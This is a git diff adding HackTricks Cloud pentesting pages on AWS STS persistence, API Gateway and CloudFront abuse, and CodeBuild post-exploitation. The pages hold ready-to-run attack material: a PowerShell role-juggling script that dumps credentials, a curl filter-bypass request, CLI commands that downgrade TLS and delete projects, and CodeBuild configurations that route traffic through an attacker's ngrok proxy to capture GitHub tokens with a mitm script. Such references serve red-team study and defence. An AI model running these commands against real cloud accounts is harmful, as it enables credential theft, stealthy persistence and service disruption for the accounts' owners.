+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md new file mode 100644 index 0000000000..45549a99e9 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md @@ -0,0 +1,158 @@ +# AWS - STS Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## STS + +For more information access: + +{% content-ref url="../aws-services/aws-sts-enum.md" %} +[aws-sts-enum.md](../aws-services/aws-sts-enum.md) +{% endcontent-ref %} + +### Assume role token + +Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence. + +
aws sts get-session-token --duration-seconds 129600
+
+# With MFA
+aws sts get-session-token \
+    --serial-number <mfa-device-name> \
+    --token-code <code-from-token>
+
+# Hardware device name is usually the number from the back of the device, such as GAHT12345678
+# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
+# Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+
+ +### Role Chain Juggling + +[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials. + +You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going: + +```bash +./aws_role_juggler.py -h +usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]] + +optional arguments: + -h, --help show this help message and exit + -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...] +``` + +{% hint style="danger" %} +Note that the [find\_circular\_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured. +{% endhint %} + +
+ +Code to perform Role Juggling from PowerShell + +```powershell +# PowerShell script to check for role juggling possibilities using AWS CLI + +# Check for AWS CLI installation +if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) { + Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'." + exit +} + +# Function to list IAM roles +function List-IAMRoles { + aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json +} + +# Initialize error count +$errorCount = 0 + +# List all roles +$roles = List-IAMRoles | ConvertFrom-Json + +# Attempt to assume each role +foreach ($role in $roles) { + $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) + try { + $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json + if ($credentials) { + Write-Host "Successfully assumed role: $($role.RoleName)" + Write-Host "Access Key: $($credentials.AccessKeyId)" + Write-Host "Secret Access Key: $($credentials.SecretAccessKey)" + Write-Host "Session Token: $($credentials.SessionToken)" + Write-Host "Expiration: $($credentials.Expiration)" + + # Set temporary credentials to assume the next role + $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId + $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey + $env:AWS_SESSION_TOKEN = $credentials.SessionToken + + # Try to assume another role using the temporary credentials + foreach ($nextRole in $roles) { + if ($nextRole.Arn -ne $role.Arn) { + $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) + try { + $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json + if ($nextCredentials) { + Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)" + Write-Host "Access Key: $($nextCredentials.AccessKeyId)" + 
Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)" + Write-Host "Session Token: $($nextCredentials.SessionToken)" + Write-Host "Expiration: $($nextCredentials.Expiration)" + } + } catch { + $errorCount++ + } + } + } + + # Reset environment variables + Remove-Item Env:\AWS_ACCESS_KEY_ID + Remove-Item Env:\AWS_SECRET_ACCESS_KEY + Remove-Item Env:\AWS_SESSION_TOKEN + } else { + $errorCount++ + } + } catch { + $errorCount++ + } +} + +# Output the number of errors if any +if ($errorCount -gt 0) { + Write-Host "$errorCount error(s) occurred during role assumption attempts." +} else { + Write-Host "No errors occurred. All roles checked successfully." +} + +Write-Host "Role juggling check complete." +``` + +
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/README.md new file mode 100644 index 0000000000..092b723de6 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/README.md @@ -0,0 +1,2 @@ +# AWS - Post Exploitation + diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md new file mode 100644 index 0000000000..405ff5e93a --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md @@ -0,0 +1,185 @@ +# AWS - API Gateway Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## API Gateway + +For more information check: + +{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} +[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) +{% endcontent-ref %} + +### Access unexposed APIs + +You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\ +Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before. + +### Bypass Request body passthrough + +This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp). + +As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation. 
+ +Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`: + +{% code overflow="wrap" %} +```yaml + RequestTemplates: + application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' +``` +{% endcode %} + +However, sending a request with **`Content-type: text/json`** would prevent that filter. + +Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`: + +{% code overflow="wrap" %} +```bash +curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}' +``` +{% endcode %} + +### Usage Plans DoS + +In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**. + +The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**. 
+ +### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment` + +An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**. + +{% code overflow="wrap" %} +```bash +API_ID="your-api-id" +RESPONSE_TYPE="DEFAULT_4XX" + +# Update the Gateway Response +aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}" + +# Create a deployment for the updated API Gateway REST API +aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod +``` +{% endcode %} + +**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. + +{% hint style="info" %} +Need testing +{% endhint %} + +### `apigateway:UpdateStage`, `apigateway:CreateDeployment` + +An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**. + +{% code overflow="wrap" %} +```bash +API_ID="your-api-id" +STAGE_NAME="Prod" + +# Update the API Gateway stage +aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5" + +# Create a deployment for the updated API Gateway REST API +aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod +``` +{% endcode %} + +**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic. 
+ +{% hint style="info" %} +Need testing +{% endhint %} + +### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment` + +An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**. + +```bash +API_ID="your-api-id" +RESOURCE_ID="your-resource-id" +HTTP_METHOD="GET" +STATUS_CODE="200" + +# Update the method response +aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true" + +# Create a deployment for the updated API Gateway REST API +aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod +``` + +**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. + +{% hint style="info" %} +Need testing +{% endhint %} + +### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment` + +An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**. + +```bash +API_ID="your-api-id" + +# Update the REST API settings +aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER' + +# Create a deployment for the updated API Gateway REST API +aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod +``` + +**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information. 
+ +{% hint style="info" %} +Need testing +{% endhint %} + +### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey` + +An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**. + +```bash +# Create a new API key +API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id') + +# Create a new usage plan +USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id') + +# Associate the API key with the usage plan +aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY +``` + +**Potential Impact**: Unauthorized access to API resources, bypassing security controls. + +{% hint style="info" %} +Need testing +{% endhint %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md new file mode 100644 index 0000000000..8a7a800b77 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md @@ -0,0 +1,57 @@ +# AWS - CloudFront Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## CloudFront + +For more information check: + +{% content-ref url="../aws-services/aws-cloudfront-enum.md" %} +[aws-cloudfront-enum.md](../aws-services/aws-cloudfront-enum.md) +{% endcontent-ref %} + +### Man-in-the-Middle + +This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script). + +#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket + +* **Create** the malicious **function**. +* **Associate** it with the CloudFront distribution. +* Set the **event type to "Viewer Response"**. + +Accessing the response you could steal the users cookie and inject a malicious JS. + +#### scenario 2: MitM where CloudFront is already using a lambda function + +* **Modify the code** of the lambda function to steal sensitive information + +You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main). + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md new file mode 100644 index 0000000000..d0db82e8c4 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md @@ -0,0 +1,111 @@ +# AWS - CodeBuild Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## CodeBuild + +For more information, check: + +{% content-ref url="../../aws-services/aws-codebuild-enum.md" %} +[aws-codebuild-enum.md](../../aws-services/aws-codebuild-enum.md) +{% endcontent-ref %} + +### Check Secrets + +If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\ +Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform. + +{% content-ref url="../../aws-privilege-escalation/aws-secrets-manager-privesc.md" %} +[aws-secrets-manager-privesc.md](../../aws-privilege-escalation/aws-secrets-manager-privesc.md) +{% endcontent-ref %} + +### Abuse CodeBuild Repo Access + +In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code: + +
+ +The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**. + +An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\ +In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you): + +
+ +And **change the Buildspec commands to exfiltrate each repo**. + +{% hint style="warning" %} +However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\ +Or does he? Check the next section +{% endhint %} + +### Leaking Access Tokens from AWS CodeBuild + +You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with: + +```bash +aws codebuild list-source-credentials +``` + +{% content-ref url="aws-codebuild-token-leakage.md" %} +[aws-codebuild-token-leakage.md](aws-codebuild-token-leakage.md) +{% endcontent-ref %} + +### `codebuild:DeleteProject` + +An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project. + +```bash +aws codebuild delete-project --name +``` + +**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project. + +### `codebuild:TagResource` , `codebuild:UntagResource` + +An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. + +```bash +aws codebuild tag-resource --resource-arn --tags +aws codebuild untag-resource --resource-arn --tag-keys +``` + +**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. + +### `codebuild:DeleteSourceCredentials` + +An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository. + +```sql +aws codebuild delete-source-credentials --arn +``` + +**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md new file mode 100644 index 0000000000..804ee23047 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md @@ -0,0 +1,216 @@ +# AWS Codebuild - Token Leakage + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Recover Github/Bitbucket Configured Tokens + +First, check if there are any source credentials configured that you could leak: + +```bash +aws codebuild list-source-credentials +``` + +### Via Docker Image + +If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. + +For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. + +The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. + +1. **Create & Upload your own Docker MitM image** + * Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. + * **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. + * You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host + * Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) +2. **Set the environment** + * Create a **new Codebuild project** or **modify** the environment of an existing one. + * Set the project to use the **previously generated Docker image** + +
+ +3. **Set the MitM proxy in your host** + +* As indicated in the **Github repo** you could use something like: + +```bash +mitmproxy --listen-port 4444 --allow-hosts "github.com" +``` + +{% hint style="success" %} +The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. +{% endhint %} + +4. **Run the build & capture the credentials** + +* You can see the token in the **Authorization** header: + +
+ +This could also be done from the aws cli with something like + +{% code overflow="wrap" %} +```bash +# Create project using a Github connection +aws codebuild create-project --cli-input-json file:///tmp/buildspec.json + +## With /tmp/buildspec.json +{ + "name": "my-demo-project", + "source": { + "type": "GITHUB", + "location": "https://github.com/uname/repo", + "buildspec": "buildspec.yml" + }, + "artifacts": { + "type": "NO_ARTIFACTS" + }, + "environment": { + "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM + "image": "docker.io/carlospolop/docker-mitm:v12", + "computeType": "BUILD_GENERAL1_SMALL", + "imagePullCredentialsType": "CODEBUILD" + } +} + +## Json + +# Start the build +aws codebuild start-build --project-name my-project2 +``` +{% endcode %} + +### Via insecureSSL + +**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ +Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. + +* First you need to enumerate the current configuration with something like: + +```bash +aws codebuild batch-get-projects --name +``` + +* Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). 
+ * Moreover, add also the env variables **http\_proxy** and **https\_proxy** pointing to your tcp ngrok like: + +{% code overflow="wrap" %} +```bash +aws codebuild update-project --name \ + --source '{ + "type": "GITHUB", + "location": "https://github.com/carlospolop/404checker", + "gitCloneDepth": 1, + "gitSubmodulesConfig": { + "fetchSubmodules": false + }, + "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", + "auth": { + "type": "CODECONNECTIONS", + "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" + }, + "reportBuildStatus": false, + "insecureSsl": true + }' \ + --environment '{ + "type": "LINUX_CONTAINER", + "image": "aws/codebuild/standard:5.0", + "computeType": "BUILD_GENERAL1_SMALL", + "environmentVariables": [ + { + "name": "http_proxy", + "value": "http://2.tcp.eu.ngrok.io:15027" + }, + { + "name": "https_proxy", + "value": "http://2.tcp.eu.ngrok.io:15027" + } + ] + }' +``` +{% endcode %} + +* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) + +```python +from mitm import MITM, protocol, middleware, crypto + +mitm = MITM( + host="127.0.0.1", + port=4444, + protocols=[protocol.HTTP], + middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. + certificate_authority = crypto.CertificateAuthority() +) +mitm.run() +``` + +* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: + +
+ +### ~~Via HTTP protocol~~ + +{% hint style="success" %} +**This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)** +{% endhint %} + +An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**. + +* An attacker could add the environment variables **http\_proxy** and **https\_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`). + +
+ +
+ +* Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` +* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) + +```python +from mitm import MITM, protocol, middleware, crypto + +mitm = MITM( + host="127.0.0.1", + port=4444, + protocols=[protocol.HTTP], + middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. + certificate_authority = crypto.CertificateAuthority() +) +mitm.run() +``` + +* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: + +
+ +{% hint style="warning" %} +Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly. +{% endhint %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
